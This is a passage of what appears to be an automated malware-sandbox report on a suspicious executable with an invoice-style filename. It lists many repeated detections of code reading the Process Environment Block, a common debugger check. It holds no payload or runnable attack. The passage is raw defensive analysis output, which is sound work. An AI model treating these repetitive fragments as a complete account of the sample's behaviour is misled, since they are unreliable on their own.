      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333602F9 mov eax, dword ptr fs:[00000030h]2_2_333602F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333472E0 mov eax, dword ptr fs:[00000030h]2_2_333472E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A2E0 mov eax, dword ptr fs:[00000030h]2_2_3335A2E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333582E0 mov eax, dword ptr fs:[00000030h]2_2_333582E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333582E0 mov eax, dword ptr fs:[00000030h]2_2_333582E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333582E0 mov eax, dword ptr fs:[00000030h]2_2_333582E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333582E0 mov eax, dword ptr fs:[00000030h]2_2_333582E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D2EC mov eax, dword ptr fs:[00000030h]2_2_3334D2EC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D2EC mov eax, dword ptr fs:[00000030h]2_2_3334D2EC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334192AB mov eax, dword ptr fs:[00000030h]2_2_334192AB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F2AE mov eax, dword ptr fs:[00000030h]2_2_3340F2AE
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333732C5 mov eax, dword ptr fs:[00000030h]2_2_333732C5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B2BC mov eax, dword ptr fs:[00000030h]2_2_3342B2BC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B2BC mov eax, dword ptr fs:[00000030h]2_2_3342B2BC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B2BC mov eax, dword ptr fs:[00000030h]2_2_3342B2BC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B2BC mov eax, dword ptr fs:[00000030h]2_2_3342B2BC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33425149 mov eax, dword ptr fs:[00000030h]2_2_33425149
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DA130 mov eax, dword ptr fs:[00000030h]2_2_333DA130
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33387128 mov eax, dword ptr fs:[00000030h]2_2_33387128
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33387128 mov eax, dword ptr fs:[00000030h]2_2_33387128
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33423157 mov eax, dword ptr fs:[00000030h]2_2_33423157
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33423157 mov eax, dword ptr fs:[00000030h]2_2_33423157
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33423157 mov eax, dword ptr fs:[00000030h]2_2_33423157
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33380118 mov eax, dword ptr fs:[00000030h]2_2_33380118
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F113 mov eax, dword ptr fs:[00000030h]2_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337510F mov eax, dword ptr fs:[00000030h]2_2_3337510F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335510D mov eax, dword ptr fs:[00000030h]2_2_3335510D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333A717A mov eax, dword ptr fs:[00000030h]2_2_333A717A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333A717A mov eax, dword ptr fs:[00000030h]2_2_333A717A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33356179 mov eax, dword ptr fs:[00000030h]2_2_33356179
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338716D mov eax, dword ptr fs:[00000030h]2_2_3338716D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338415F mov eax, dword ptr fs:[00000030h]2_2_3338415F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334A147 mov eax, dword ptr fs:[00000030h]2_2_3334A147
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334A147 mov eax, dword ptr fs:[00000030h]2_2_3334A147
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334A147 mov eax, dword ptr fs:[00000030h]2_2_3334A147
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E314A mov eax, dword ptr fs:[00000030h]2_2_333E314A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E314A mov eax, dword ptr fs:[00000030h]2_2_333E314A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E314A mov eax, dword ptr fs:[00000030h]2_2_333E314A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E314A mov eax, dword ptr fs:[00000030h]2_2_333E314A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F13E mov eax, dword ptr fs:[00000030h]2_2_3340F13E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333841BB mov ecx, dword ptr fs:[00000030h]2_2_333841BB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333841BB mov eax, dword ptr fs:[00000030h]2_2_333841BB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333841BB mov eax, dword ptr fs:[00000030h]2_2_333841BB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333831BE mov eax, dword ptr fs:[00000030h]2_2_333831BE
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333831BE mov eax, dword ptr fs:[00000030h]2_2_333831BE
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E1A4 mov eax, dword ptr fs:[00000030h]2_2_3338E1A4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E1A4 mov eax, dword ptr fs:[00000030h]2_2_3338E1A4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33379194 mov eax, dword ptr fs:[00000030h]2_2_33379194
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391190 mov eax, dword ptr fs:[00000030h]2_2_33391190
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391190 mov eax, dword ptr fs:[00000030h]2_2_33391190
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334181EE mov eax, dword ptr fs:[00000030h]2_2_334181EE
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334181EE mov eax, dword ptr fs:[00000030h]2_2_334181EE
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33354180 mov eax, dword ptr fs:[00000030h]2_2_33354180
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33354180 mov eax, dword ptr fs:[00000030h]2_2_33354180
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33354180 mov eax, dword ptr fs:[00000030h]2_2_33354180
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333491F0 mov eax, dword ptr fs:[00000030h]2_2_333491F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333491F0 mov eax, dword ptr fs:[00000030h]2_2_333491F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333601F1 mov eax, dword ptr fs:[00000030h]2_2_333601F1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333601F1 mov eax, dword ptr fs:[00000030h]2_2_333601F1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333601F1 mov eax, dword ptr fs:[00000030h]2_2_333601F1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337F1F0 mov eax, dword ptr fs:[00000030h]2_2_3337F1F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337F1F0 mov eax, dword ptr fs:[00000030h]2_2_3337F1F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333591E5 mov eax, dword ptr fs:[00000030h]2_2_333591E5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333591E5 mov eax, dword ptr fs:[00000030h]2_2_333591E5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A1E3 mov eax, dword ptr fs:[00000030h]2_2_3335A1E3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A1E3 mov eax, dword ptr fs:[00000030h]2_2_3335A1E3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A1E3 mov eax, dword ptr fs:[00000030h]2_2_3335A1E3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A1E3 mov eax, dword ptr fs:[00000030h]2_2_3335A1E3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335A1E3 mov eax, dword ptr fs:[00000030h]2_2_3335A1E3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E0 mov eax, dword ptr fs:[00000030h]2_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333481EB mov eax, dword ptr fs:[00000030h]2_2_333481EB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334251B6 mov eax, dword ptr fs:[00000030h]2_2_334251B6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333601C0 mov eax, dword ptr fs:[00000030h]2_2_333601C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333601C0 mov eax, dword ptr fs:[00000030h]2_2_333601C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333651C0 mov eax, dword ptr fs:[00000030h]2_2_333651C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333651C0 mov eax, dword ptr fs:[00000030h]2_2_333651C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333651C0 mov eax, dword ptr fs:[00000030h]2_2_333651C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333651C0 mov eax, dword ptr fs:[00000030h]2_2_333651C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D02D mov eax, dword ptr fs:[00000030h]2_2_3334D02D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342505B mov eax, dword ptr fs:[00000030h]2_2_3342505B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392010 mov ecx, dword ptr fs:[00000030h]2_2_33392010
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33375004 mov eax, dword ptr fs:[00000030h]2_2_33375004
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33375004 mov ecx, dword ptr fs:[00000030h]2_2_33375004
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33358009 mov eax, dword ptr fs:[00000030h]2_2_33358009
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33356074 mov eax, dword ptr fs:[00000030h]2_2_33356074
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33356074 mov eax, dword ptr fs:[00000030h]2_2_33356074
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33357072 mov eax, dword ptr fs:[00000030h]2_2_33357072
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333F9060 mov eax, dword ptr fs:[00000030h]2_2_333F9060
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351051 mov eax, dword ptr fs:[00000030h]2_2_33351051
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33351051 mov eax, dword ptr fs:[00000030h]2_2_33351051
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33380044 mov eax, dword ptr fs:[00000030h]2_2_33380044
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF0A5 mov eax, dword ptr fs:[00000030h]2_2_333FF0A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333900A5 mov eax, dword ptr fs:[00000030h]2_2_333900A5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334C090 mov eax, dword ptr fs:[00000030h]2_2_3334C090
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334A093 mov ecx, dword ptr fs:[00000030h]2_2_3334A093
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334C0F6 mov eax, dword ptr fs:[00000030h]2_2_3334C0F6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424080 mov eax, dword ptr fs:[00000030h]2_2_33424080
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338D0F0 mov eax, dword ptr fs:[00000030h]2_2_3338D0F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3338D0F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333490F8 mov eax, dword ptr fs:[00000030h]2_2_333490F8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333490F8 mov eax, dword ptr fs:[00000030h]2_2_333490F8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333490F8 mov eax, dword ptr fs:[00000030h]2_2_333490F8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333490F8 mov eax, dword ptr fs:[00000030h]2_2_333490F8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B0D6 mov eax, dword ptr fs:[00000030h]2_2_3334B0D6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B0D6 mov eax, dword ptr fs:[00000030h]2_2_3334B0D6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B0D6 mov eax, dword ptr fs:[00000030h]2_2_3334B0D6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B0D6 mov eax, dword ptr fs:[00000030h]2_2_3334B0D6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336B0D0 mov eax, dword ptr fs:[00000030h]2_2_3336B0D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340B0AF mov eax, dword ptr fs:[00000030h]2_2_3340B0AF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334250B7 mov eax, dword ptr fs:[00000030h]2_2_334250B7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33379723 mov eax, dword ptr fs:[00000030h]2_2_33379723
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335471B mov eax, dword ptr fs:[00000030h]2_2_3335471B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335471B mov eax, dword ptr fs:[00000030h]2_2_3335471B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B705 mov eax, dword ptr fs:[00000030h]2_2_3334B705
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B705 mov eax, dword ptr fs:[00000030h]2_2_3334B705
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B705 mov eax, dword ptr fs:[00000030h]2_2_3334B705
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B705 mov eax, dword ptr fs:[00000030h]2_2_3334B705
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335D700 mov ecx, dword ptr fs:[00000030h]2_2_3335D700
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337270D mov eax, dword ptr fs:[00000030h]2_2_3337270D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337270D mov eax, dword ptr fs:[00000030h]2_2_3337270D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337270D mov eax, dword ptr fs:[00000030h]2_2_3337270D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341970B mov eax, dword ptr fs:[00000030h]2_2_3341970B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341970B mov eax, dword ptr fs:[00000030h]2_2_3341970B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33354779 mov eax, dword ptr fs:[00000030h]2_2_33354779
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33354779 mov eax, dword ptr fs:[00000030h]2_2_33354779
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33380774 mov eax, dword ptr fs:[00000030h]2_2_33380774
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33362760 mov ecx, dword ptr fs:[00000030h]2_2_33362760
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F717 mov eax, dword ptr fs:[00000030h]2_2_3340F717
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33391763 mov eax, dword ptr fs:[00000030h]2_2_33391763
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov eax, dword ptr fs:[00000030h]2_2_33372755
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov eax, dword ptr fs:[00000030h]2_2_33372755
